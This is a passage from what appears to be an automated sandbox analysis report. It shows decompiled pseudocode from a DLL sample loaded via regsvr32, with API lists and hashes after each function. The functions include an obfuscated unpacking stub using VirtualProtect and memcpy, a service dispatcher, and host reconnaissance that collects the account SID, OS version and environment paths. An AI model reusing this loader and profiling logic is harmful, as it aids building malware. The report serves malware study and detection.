                            						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) & 0x00000000;
                            						 *(_t417 + 0x4353c2) =  *(_t417 + 0x4353c2) | _t479 - _v12 | _t337;
                            						_t479 = _v12;
                            						_t450 =  *_t571;
                            						_t575 =  &(_t571[1]);
                            						_t426 =  *_t575;
                            						_t571 = _t575 - 0xfffffffc;
                            					}
                            				}
                            				_push(_t450);
                            				_push(_t426);
                            				_t339 = _t337 & 0x00000000 ^ (_t523 ^  *_t571 | _a4);
                            				_t526 = _t523;
                            				if( *(_t417 + 0x43524c) == 0) {
                            					_t409 =  *((intOrPtr*)(_t417 + 0x44105c))();
                            					_v12 = _t450;
                            					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) & 0x00000000;
                            					 *(_t417 + 0x43524c) =  *(_t417 + 0x43524c) ^ (_t450 & 0x00000000 | _t409);
                            					_t450 = _v12;
                            					 *_t67 = _t339;
                            					_t339 = 0 + _v12;
                            				}
                            				if( *(_t417 + 0x43539a) == 0) {
                            					_t404 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435020, _t417 + 0x435a31, _t339);
                            					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) & 0x00000000;
                            					 *(_t417 + 0x43517e) =  *(_t417 + 0x43517e) ^ (_t479 & 0x00000000 | _t404);
                            					_t516 = _t479;
                            					_t405 =  *((intOrPtr*)(_t417 + 0x441060))();
                            					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) & 0x00000000;
                            					 *(_t417 + 0x43539a) =  *(_t417 + 0x43539a) | _t516 -  *_t571 ^ _t405;
                            					_t479 = _t516;
                            					if( *(_t417 + 0x4355b1) == 0) {
                            						_t408 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x435068);
                            						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) & 0x00000000;
                            						 *(_t417 + 0x4355b1) =  *(_t417 + 0x4355b1) ^ (_t426 ^  *_t571 | _t408);
                            						_t426 = _t426;
                            					}
                            					_t339 =  *_t571;
                            					_t571 = _t571 - 0xfffffffc;
                            				}
                            				 *_t93 =  *((intOrPtr*)(_t417 + 0x441044))(_t417 + 0x435669, _t417 + 0x4350e8, _t339 +  *((intOrPtr*)(_t339 + 0x3c)));
                            				_push(_v12);
                            				_pop( *_t95);
                            				_t572 = _t571 - 0xfffffffc;
                            				_push(0 ^  *_t571);
                            				_t346 = _t417 + 0x43517b;
                            				if( *(_t417 + 0x43525c) == 0) {
                            					_t400 =  *((intOrPtr*)(_t417 + 0x4410a8))( *((intOrPtr*)(_t417 + 0x4352d7)),  *((intOrPtr*)(_t417 + 0x43563d)), _t346);
                            					_v12 = _t450;
                            					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) & 0x00000000;
                            					 *(_t417 + 0x43525c) =  *(_t417 + 0x43525c) ^ (_t450 - _v12 | _t400);
                            					_t450 = _v12;
                            					_t346 = (_t400 & 0x00000000) +  *_t572;
                            					_t572 = _t572 - 0xfffffffc;
                            				}
                            				_push(_t346);
                            				_t347 = _t417 + 0x435162;
                            				if( *(_t417 + 0x4357ee) == 0) {
                            					_t398 =  *((intOrPtr*)(_t417 + 0x441060))();
                            					_v12 = _t479;
                            					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) & 0x00000000;
                            					 *(_t417 + 0x4357ee) =  *(_t417 + 0x4357ee) ^ _t479 - _v12 ^ _t398;
                            					_t479 = _v12;
                            					 *_t118 = _t347;
                            					_t347 = 0 + _v12;
                            				}
                            				_t348 =  *((intOrPtr*)(_t417 + 0x441044))();
                            				_v12 = _t526;
                            				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) & 0x00000000;
                            				 *(_t417 + 0x43516b) =  *(_t417 + 0x43516b) | _t526 - _v12 ^ _t348;
                            				_t529 = _v12;
                            				 *_t128 = _t347;
                            				_t350 = 0 + _v12;
                            				if( *(_t417 + 0x4357de) == 0) {
                            					_t397 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x4350d4, _t350);
                            					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) & 0x00000000;
                            					 *(_t417 + 0x4357de) =  *(_t417 + 0x4357de) | _t450 -  *_t572 ^ _t397;
                            					_t450 = _t450;
                            					_pop( *_t137);
                            					_t350 = _v12;
                            				}
                            				_push(_t350);
                            				_v12 = _t450;
                            				_t481 = _t479 & 0x00000000 ^ (_t450 ^ _v12 | _t350);
                            				_t351 =  *(_t481 + 6) & 0x0000ffff;
                            				if( *(_t417 + 0x435579) == 0) {
                            					_t394 =  *((intOrPtr*)(_t417 + 0x4410a4))( *((intOrPtr*)(_t417 + 0x4352a4)), _t351);
                            					 *_t572 = _t529;
                            					 *(_t417 + 0x435579) = 0 ^ _t394;
                            					_t529 = 0;
                            					_t351 = 0 ^  *_t572;
                            					_t572 =  &(_t572[1]);
                            				}
                            				if( *((intOrPtr*)(_t417 + 0x435575)) == 0) {
                            					if( *(_t417 + 0x43534a) == 0) {
                            						_t392 =  *((intOrPtr*)(_t417 + 0x441060))(_t351);
                            						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) & 0x00000000;
                            						 *(_t417 + 0x43534a) =  *(_t417 + 0x43534a) | _t529 -  *_t572 | _t392;
                            						_t529 = _t529;
                            						_t351 =  *_t572;
                            						_t572 = _t572 - 0xfffffffc;
                            					}
                            					_push(_t351);
                            					_push(_t417 + 0x43573a);
                            					if( *(_t417 + 0x43580e) == 0) {
                            						_t391 =  *((intOrPtr*)(_t417 + 0x441068))(_t417 + 0x43505c);
                            						_v12 = _t529;
                            						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) & 0x00000000;
                            						 *(_t417 + 0x43580e) =  *(_t417 + 0x43580e) | _t529 & 0x00000000 | _t391;
                            						_t529 = _v12;
                            					}
                            					_t384 =  *((intOrPtr*)(_t417 + 0x441054))();
                            					if( *(_t417 + 0x435555) == 0) {
                            						_t388 =  *((intOrPtr*)(_t417 + 0x441060))(_t384);
                            						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) & 0x00000000;
                            						 *(_t417 + 0x435555) =  *(_t417 + 0x435555) ^ _t426 ^  *_t572 ^ _t388;
                            						_t426 = _t426;
                            						_t384 = _t388 & 0x00000000 |  *_t572;
                            						_t572 = _t572 - 0xfffffffc;
                            					}
                            					 *_t171 = _t384;
                            					_push(_v12);
                            					_pop( *_t173);
                            					if( *((intOrPtr*)(_t417 + 0x435716)) == 0) {
                            						 *_t177 =  *((intOrPtr*)(_t417 + 0x44106c))(_t417 + 0x4358e4);
                            						_push(_v12);
                            						_pop( *_t179);
                            					}
                            					_pop( *_t180);
                            					_t351 = 0 + _v12;
                            				}
                            				_v12 = _t481;
                            				_v8 = _v8 & 0x00000000;
                            				_v8 = _v8 ^ (_t481 ^ _v12 | _t351);
                            				_t484 = _v12;
                            				if( *(_t417 + 0x43577a) == 0) {
                            					_t351 =  *((intOrPtr*)(_t417 + 0x4410a8))(0,  *((intOrPtr*)(_t417 + 0x4351e3)));
                            					 *_t572 = _t484;
                            					 *(_t417 + 0x43577a) = _t351;
                            					_t484 = 0;
                            				}
                            				_push(_t484);
                            				if( *(_t417 + 0x435008) == 0) {
                            					_t351 =  *((intOrPtr*)(_t417 + 0x441058))();
                            					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) & 0x00000000;
                            					 *(_t417 + 0x435008) =  *(_t417 + 0x435008) | _t529 & 0x00000000 ^ _t351;
                            					_t529 = _t529;
                            				}
                            				 *_t572 = _t417;
                            				_t454 = 0 ^  *(_t484 + 0x54);
                            				_t420 = 0;
                            				_v12 = _t351;
                            				_t486 = _t484 & 0x00000000 ^ (_t351 - _v12 |  *(_t420 + 0x4350b0));
                            				if( *(_t420 + 0x435156) == 0) {
                            					_t205 = _t420 + 0x435900; // 0x435900
                            					_t382 =  *((intOrPtr*)(_t420 + 0x44106c))(_t205, _t454);
                            					_v12 = _t486;
                            					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) & 0x00000000;
                            					 *(_t420 + 0x435156) =  *(_t420 + 0x435156) | _t486 ^ _v12 | _t382;
                            					_t486 = _v12;
                            					_t454 =  *_t572;
                            					_t572 =  &(_t572[1]);
                            				}
                            				_t531 = _t529 & 0x00000000 | _t420 & 0x00000000 ^ _a4;
                            				_t423 = _t420;
                            				_t428 = _t426 & 0x00000000 ^ (_t562 & 0x00000000 | _t454);
                            				_t565 = _t562;
                            				if(_t486 == _t531) {
                            					L50:
                            					_pop( *_t258);
                            					if( *(_t423 + 0x4354c6) == 0) {
                            						_t371 =  *((intOrPtr*)(_t423 + 0x441058))();
                            						_v12 = _t531;
                            						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) & 0x00000000;
                            						 *(_t423 + 0x4354c6) =  *(_t423 + 0x4354c6) ^ _t531 ^ _v12 ^ _t371;
                            						_t531 = _v12;
                            					}
                            					_t489 =  &_a244;
                            					_t568 = _t565;
                            					do {
                            						_t431 = _t428;
                            						_v12 = _t423;
                            						_t433 = _t431 & 0x00000000 | _t423 & 0x00000000 ^  *(_t489 + 0x10);
                            						_t423 = _v12;
                            						_t273 = _t423 + 0x4350ed; // 0x4350ed
                            						_t274 = _t423 + 0x43585d; // 0x43585d
                            						_t357 =  *((intOrPtr*)(_t423 + 0x441044))(_t274, _t273, _t433, _t489);
                            						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) & 0x00000000;
                            						 *(_t423 + 0x435294) =  *(_t423 + 0x435294) | _t489 & 0x00000000 ^ _t357;
                            						_t492 = _t489;
                            						_t531 = (_t531 & 0x00000000 | _t428 & 0x00000000 | _a4) +  *((intOrPtr*)(_t492 + 0x14));
                            						_t358 = memcpy( *((intOrPtr*)(_t492 + 0xc)) +  *(_t423 + 0x4350b0), _t531, _t433 & 0x00000000 |  *_t572);
                            						_t572 =  &((_t572 - 0xfffffffc)[3]);
                            						_t428 = 0;
                            						if( *(_t423 + 0x435944) == 0) {
                            							_t284 = _t423 + 0x435a21; // 0x435a21
                            							_t358 =  *((intOrPtr*)(_t423 + 0x441054))(_t284);
                            							_v12 = _t531;
                            							 *(_t423 + 0x435944) = 0 ^ _t358;
                            							_t531 = _v12;
                            						}
                            						_pop( *_t289);
                            						_t489 =  &_a36;
                            						_t568 = _t568;
                            						if( *(_t423 + 0x4356c1) == 0) {
                            							_t358 =  *((intOrPtr*)(_t423 + 0x4410a4))(1);
                            							_v12 = _t531;
                            							 *(_t423 + 0x4356c1) = _t358;
                            							_t531 = _v12;
                            						}
                            						_t296 =  &_v8;
                            						 *_t296 = _v8 - 1;
                            					} while ( *_t296 != 0);
                            					if( *(_t423 + 0x435018) == 0) {
                            						_t358 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x43549a)), 9);
                            						_push(0);
                            						 *_t572 = _t489;
                            						 *(_t423 + 0x435018) = 0 ^ _t358;
                            					}
                            					_t500 =  *_t572;
                            					_t574 = _t572 - 0xfffffffc;
                            					_v12 = _t454;
                            					_t457 = _v12;
                            					_t361 = (_t358 & 0x00000000 ^ _t454 ^ _v12 ^  *(_t500 + 0x28)) +  *(_t423 + 0x4350b0);
                            					if( *(_t423 + 0x435376) == 0) {
                            						_t308 = _t423 + 0x435524; // 0x435524
                            						_t368 =  *((intOrPtr*)(_t423 + 0x44106c))(_t361);
                            						_v12 = _t531;
                            						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) & 0x00000000;
                            						 *(_t423 + 0x435376) =  *(_t423 + 0x435376) | _t531 ^ _v12 | _t368;
                            						_t531 = _v12;
                            						 *_t317 = _t308;
                            						_t361 = _t368 & 0x00000000 ^ _v12;
                            					}
                            					_v12 = _t500;
                            					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) & 0x00000000;
                            					 *(_t423 + 0x4351a7) =  *(_t423 + 0x4351a7) | _t500 ^ _v12 ^ _t361;
                            					_t503 = _v12;
                            					_t535 = _t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0));
                            					_t364 = _t361;
                            					if((_t531 & 0x00000000 ^ (_t361 & 0x00000000 |  *(_t423 + 0x4350b0))) > 0) {
                            						if( *(_t423 + 0x43536e) == 0) {
                            							_t366 =  *((intOrPtr*)(_t423 + 0x441070))(0);
                            							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) & 0x00000000;
                            							 *(_t423 + 0x43536e) =  *(_t423 + 0x43536e) | _t457 ^  *_t574 | _t366;
                            							_t457 = _t457;
                            						}
                            						_t365 = E00782C41(_t423, _t428, _t457, _t503, _t535, _t535); // executed
                            						_t364 = E007834DA(_t365, _t423, _t428, _t457, _t503, _t535, _t535);
                            					}
                            					_pop( *_t333);
                            					_pop( *_t335);
                            					return _t364;
                            				} else {
                            					if( *(_t423 + 0x435004) == 0) {
                            						_t380 =  *((intOrPtr*)(_t423 + 0x4410a8))( *((intOrPtr*)(_t423 + 0x4352fb)),  *((intOrPtr*)(_t423 + 0x4354e6)), _t454, _t428);
                            						_v12 = _t454;
                            						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) & 0x00000000;
                            						 *(_t423 + 0x435004) =  *(_t423 + 0x435004) ^ _t454 & 0x00000000 ^ _t380;
                            						_pop( *_t225);
                            						_t454 = _v12;
                            						_pop( *_t227);
                            						_t428 = _v12 + (_t428 & 0x00000000);
                            					}
                            					do {
                            						asm("movsb");
                            						_t428 = _t428 - 1;
                            					} while (_t428 != 0);
                            					if( *(_t423 + 0x4359f5) == 0) {
                            						_t230 = _t423 + 0x4356a1; // 0x4356a1
                            						_t379 =  *((intOrPtr*)(_t423 + 0x441068))(_t230, _t454);
                            						_v12 = _t531;
                            						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) & 0x00000000;
                            						 *(_t423 + 0x4359f5) =  *(_t423 + 0x4359f5) ^ _t531 - _v12 ^ _t379;
                            						_t531 = _v12;
                            						_t454 = _t454 & 0x00000000 |  *_t572;
                            						_t572 = _t572 - 0xfffffffc;
                            					}
                            					_t486 = _t486 & 0x00000000 ^ (_t428 -  *_t572 |  *(_t423 + 0x4350b0));
                            					_t428 = _t428;
                            					 *((intOrPtr*)(_t423 + 0x4354d2)) = 0x40;
                            					_t241 = _t423 + 0x4356e5; // 0x4356e5
                            					_t242 = _t423 + 0x4352b4; // 0x4352b4
                            					_t374 =  *((intOrPtr*)(_t423 + 0x441044))(_t242, _t241, _t454);
                            					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) & 0x00000000;
                            					 *(_t423 + 0x4351cb) =  *(_t423 + 0x4351cb) | _t531 ^  *_t572 ^ _t374;
                            					_t531 = _t531;
                            					_t454 =  *_t572;
                            					_t572 = _t572 - 0xfffffffc;
                            					_t248 = _t423 + 0x4354d2; // 0x4354d2
                            					_push(2);
                            					_push(_t454);
                            					if( *(_t423 + 0x435010) == 0) {
                            						_t377 =  *((intOrPtr*)(_t423 + 0x441058))();
                            						_v12 = _t531;
                            						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) & 0x00000000;
                            						 *(_t423 + 0x435010) =  *(_t423 + 0x435010) ^ _t531 & 0x00000000 ^ _t377;
                            						_t531 = _v12;
                            					}
                            					VirtualProtect(_t486, ??, ??, ??);
                            					goto L50;
                            				}
                            			}

                            APIs
                            • VirtualProtect.KERNEL32(00000000,00000000,00000002,004354D2), ref: 00782A3D
                            Memory Dump Source
                            • Source File: 0000000D.00000002.622781002.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_780000_regsvr32.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
                            • Instruction ID: b4f2dd6b54ee2e02cdaad76a5dbb31bc9049a5d2bea027b21f301c19d0520c56
                            • Opcode Fuzzy Hash: 965ff0d501365a58e1c6b305a2901c127183e1ebb994f7cd1b7f885fc6bc8627
                            • Instruction Fuzzy Hash: 6A426E72810604EFFF04DFA4C98979A7BB5FF54325F0851AADC0DAE04AD77815A4CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E100030B7() {
                            				int _t3;
                            				struct _SERVICE_TABLE_ENTRY* _t6;
                            				int* _t11;
                            				intOrPtr _t12;
                            
                            				_t3 = E10008604(0x10);
                            				 *0x1001e71c = _t3;
                            				if(_t3 == 0) {
                            					L4:
                            					return _t3 | 0xffffffff;
                            				} else {
                            					_t3 = E10008604(0xa);
                            					_t11 =  *0x1001e71c; // 0x19536e0
                            					 *_t11 = _t3;
                            					if(_t3 == 0) {
                            						goto L4;
                            					} else {
                            						_t12 =  *0x1001e688; // 0x1930590
                            						E1000902D(1, _t3, 7, 8, _t12 + 0x648);
                            						_t6 =  *0x1001e71c; // 0x19536e0
                            						 *((intOrPtr*)(_t6 + 4)) = E10003052;
                            						_t3 = StartServiceCtrlDispatcherA(_t6);
                            						if(_t3 == 0) {
                            							goto L4;
                            						} else {
                            							return 0;
                            						}
                            					}
                            				}
                            			}

                            APIs
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • StartServiceCtrlDispatcherA.ADVAPI32(019536E0), ref: 1000310C
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocCtrlDispatcherHeapServiceStart
                            • String ID:
                            • API String ID: 3270895466-0
                            • Opcode ID: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
                            • Instruction ID: ac16b269da70e1785f3d8de3b20eaf3184fc588054e4d94b314cf4149a8ccc23
                            • Opcode Fuzzy Hash: 8e36714de1a88bfbba535e0dee9b6efdb0d5928a7c2cdeb04c08aa71bf5ba524
                            • Instruction Fuzzy Hash: 59F03AB42443428BF748CB74DC92B5A3398EB44394F55C128E615CB2D5EE75D8128A14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 91%
                            			E1000D01F(void* __fp0) {
                            				long _v8;
                            				long _v12;
                            				union _SID_NAME_USE _v16;
                            				struct _SYSTEM_INFO _v52;
                            				char _v180;
                            				short _v692;
                            				char _v704;
                            				char _v2680;
                            				void* __esi;
                            				struct _OSVERSIONINFOA* _t81;
                            				intOrPtr _t83;
                            				void* _t84;
                            				long _t86;
                            				void** _t88;
                            				intOrPtr _t90;
                            				intOrPtr _t91;
                            				intOrPtr _t92;
                            				intOrPtr _t97;
                            				void* _t98;
                            				intOrPtr _t103;
                            				char* _t105;
                            				void* _t108;
                            				intOrPtr _t111;
                            				long _t115;
                            				signed int _t117;
                            				long _t119;
                            				intOrPtr _t124;
                            				intOrPtr _t127;
                            				intOrPtr _t130;
                            				intOrPtr _t134;
                            				intOrPtr _t145;
                            				intOrPtr _t147;
                            				intOrPtr _t149;
                            				intOrPtr _t152;
                            				intOrPtr _t154;
                            				signed int _t159;
                            				struct HINSTANCE__* _t162;
                            				short* _t164;
                            				intOrPtr _t167;
                            				WCHAR* _t168;
                            				char* _t169;
                            				intOrPtr _t181;
                            				intOrPtr _t200;
                            				void* _t215;
                            				long _t218;
                            				void* _t219;
                            				char* _t220;
                            				struct _OSVERSIONINFOA* _t222;
                            				void* _t223;
                            				int* _t224;
                            				void* _t241;
                            
                            				_t241 = __fp0;
                            				_t162 =  *0x1001e69c; // 0x10000000
                            				_t81 = E10008604(0x1ac4);
                            				_t222 = _t81;
                            				if(_t222 == 0) {
                            					return _t81;
                            				}
                            				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                            				_t83 =  *0x1001e684; // 0x19afaa0
                            				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                            				_t3 = _t222 + 0x648; // 0x648
                            				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                            				_t5 = _t222 + 0x1644; // 0x1644
                            				_t216 = _t5;
                            				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                            				_t227 = _t86;
                            				if(_t86 != 0) {
                            					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
                            				}
                            				GetCurrentProcess();
                            				_t88 = E1000BA05(); // executed
                            				 *(_t222 + 0x110) = _t88;
                            				_t178 =  *_t88;
                            				if(E1000BB8D( *_t88) == 0) {
                            					_t90 = E1000BA62(_t178, _t222);
                            					__eflags = _t90;
                            					_t181 = (0 | _t90 > 0x00000000) + 1;
                            					__eflags = _t181;
                            					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                            				} else {
                            					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                            				}
                            				_t12 = _t222 + 0x220; // 0x220, executed
                            				_t91 = E1000E3F1(_t12); // executed
                            				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
                            				_t92 = E1000E3B6(_t12); // executed
                            				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
                            				 *(_t222 + 0x224) = _t162;
                            				_v12 = 0x80;
                            				_v8 = 0x100;
                            				_t22 = _t222 + 0x114; // 0x114
                            				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
                            					GetLastError();
                            				}
                            				_t97 =  *0x1001e694; // 0x19afbf8
                            				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                            				_t26 = _t222 + 0x228; // 0x228
                            				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                            				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                            				GetLastError();
                            				_t31 = _t222 + 0x228; // 0x228
                            				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
                            				_t34 = _t222 + 0x114; // 0x114, executed
                            				_t103 = E1000B7A8(_t34,  &_v692);
                            				_t35 = _t222 + 0xb0; // 0xb0
                            				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                            				_push(_t35);
                            				E1000B67D(_t103, _t35, _t98, _t241);
                            				_t37 = _t222 + 0xb0; // 0xb0
                            				_t105 = _t37;
                            				_t38 = _t222 + 0xd0; // 0xd0
                            				_t164 = _t38;
                            				if(_t105 != 0) {
                            					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                            					if(_t159 > 0) {
                            						_t164[_t159] = 0;
                            					}
                            				}
                            				_t41 = _t222 + 0x438; // 0x438
                            				_t42 = _t222 + 0x228; // 0x228
                            				E10008FD8(_t42, _t41);
                            				_t43 = _t222 + 0xb0; // 0xb0
                            				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
                            				_t44 = _t222 + 0x100c; // 0x100c
                            				E1000B88A(_t108, _t44, _t241);
                            				_t199 = GetCurrentProcess(); // executed
                            				_t111 = E1000BBDF(_t110); // executed
                            				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
                            				memset(_t222, 0, 0x9c);
                            				_t224 = _t223 + 0xc;
                            				_t222->dwOSVersionInfoSize = 0x9c;
                            				GetVersionExA(_t222);
                            				_t167 =  *0x1001e684; // 0x19afaa0
                            				_t115 = 0;
                            				_v8 = 0;
                            				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                            					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                            					_t115 = _v8;
                            				}
                            				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                            				if(_t115 == 0) {
                            					GetSystemInfo( &_v52);
                            					_t117 = _v52.dwOemId & 0x0000ffff;
                            				} else {
                            					_t117 = 9;
                            				}
                            				_t54 = _t222 + 0x1020; // 0x1020
                            				_t168 = _t54;
                            				 *(_t222 + 0x9c) = _t117;
                            				GetWindowsDirectoryW(_t168, 0x104);
                            				_t119 = E100095E1(_t199, 0x10c);
                            				_t200 =  *0x1001e684; // 0x19afaa0
                            				_t218 = _t119;
                            				 *_t224 = 0x104;
                            				_push( &_v704);
                            				_push(_t218);
                            				_v8 = _t218;
                            				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                            					_t154 =  *0x1001e684; // 0x19afaa0
                            					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                            				}
                            				E100085D5( &_v8);
                            				_t124 =  *0x1001e684; // 0x19afaa0
                            				_t61 = _t222 + 0x1434; // 0x1434
                            				_t219 = _t61;
                            				 *_t224 = 0x209;
                            				_push(_t219);
                            				_push(L"USERPROFILE");
                            				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                            					E10009640(_t219, 0x105, L"%s\\%s", _t168);
                            					_t152 =  *0x1001e684; // 0x19afaa0
                            					_t224 =  &(_t224[5]);
                            					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                            				}
                            				_push(0x20a);
                            				_t64 = _t222 + 0x122a; // 0x122a
                            				_t169 = L"TEMP";
                            				_t127 =  *0x1001e684; // 0x19afaa0
                            				_push(_t169);
                            				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                            					_t149 =  *0x1001e684; // 0x19afaa0
                            					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                            				}
                            				_push(0x40);
                            				_t220 = L"SystemDrive";
                            				_push( &_v180);
                            				_t130 =  *0x1001e684; // 0x19afaa0
                            				_push(_t220);
                            				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                            					_t147 =  *0x1001e684; // 0x19afaa0
                            					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                            				}
                            				_v8 = 0x7f;
                            				_t72 = _t222 + 0x199c; // 0x199c
                            				_t134 =  *0x1001e684; // 0x19afaa0
                            				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                            				_t75 = _t222 + 0x100c; // 0x100c
                            				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
                            				_t76 = _t222 + 0x1858; // 0x1858
                            				E100122D3( &_v2680, _t76, 0x20);
                            				_t79 = _t222 + 0x1878; // 0x1878
                            				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
                            				_t145 = E1000CD33(_t79); // executed
                            				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
                            				return _t222;
                            			}

                            APIs
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • GetCurrentProcessId.KERNEL32 ref: 1000D046
                            • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                            • GetCurrentProcess.KERNEL32 ref: 1000D09F
                            • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                            • GetLastError.KERNEL32 ref: 1000D13E
                            • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                            • GetLastError.KERNEL32 ref: 1000D172
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                            • GetCurrentProcess.KERNEL32 ref: 1000D20E
                            • memset.MSVCRT ref: 1000D229
                            • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                            • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                            • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.624165771.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 0000000D.00000002.624156732.0000000010000000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharDirectoryHeapInfoLookupMultiSystemVersionWideWindowsmemset
                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                            • API String ID: 1775177207-2706916422
                            • Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                            • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                            • Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                            • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 82%
                            			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                            				long _v8;
                            				char _v16;
                            				short _v144;
                            				short _v664;
                            				void* _t19;
                            				struct HINSTANCE__* _t22;
                            				long _t23;
                            				long _t24;
                            				char* _t27;
                            				WCHAR* _t32;
                            				long _t33;
                            				void* _t38;
                            				void* _t49;
                            				struct _SECURITY_ATTRIBUTES* _t53;
                            				void* _t54;
                            				intOrPtr* _t55;
                            				void* _t57;
                            
                            				_t49 = __edx;
                            				OutputDebugStringA("Hello qqq"); // executed
                            				if(_a8 != 1) {
                            					if(_a8 != 0) {
                            						L12:
                            						return 1;
                            					}
                            					SetLastError(0xaa);
                            					L10:
                            					return 0;
                            				}
                            				E100085EF();
                            				_t19 = E1000980C( &_v16);
                            				_t57 = _t49;
